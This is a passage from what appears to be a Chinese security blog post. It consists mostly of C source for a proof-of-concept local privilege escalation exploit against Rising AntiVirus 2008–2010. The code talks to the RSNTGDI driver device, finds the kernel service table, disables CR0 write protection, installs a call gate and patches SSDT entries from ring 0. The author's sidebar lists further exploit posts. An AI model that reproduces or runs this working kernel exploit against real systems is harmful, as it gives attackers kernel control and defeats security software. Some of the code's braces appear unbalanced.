(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 \n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n");

g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI" ,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

Author: 坏人咖啡

Posts by 坏人咖啡

360安全卫士本地提权漏洞的webshell利用程序

两个挺有意思的字符动画

从最近360和瑞星的漏洞看到的东西有意思

老外的一个免费的VPN

发一个网摘网站的IE右键功能的源码

eWebEditor遍历目录漏洞

360安全卫士本地提权漏洞利用程序

Rising AntiVirus 2008/2009/2010 本地权限提升漏洞

文章分类

热门标签

随机文章

文章归档

Users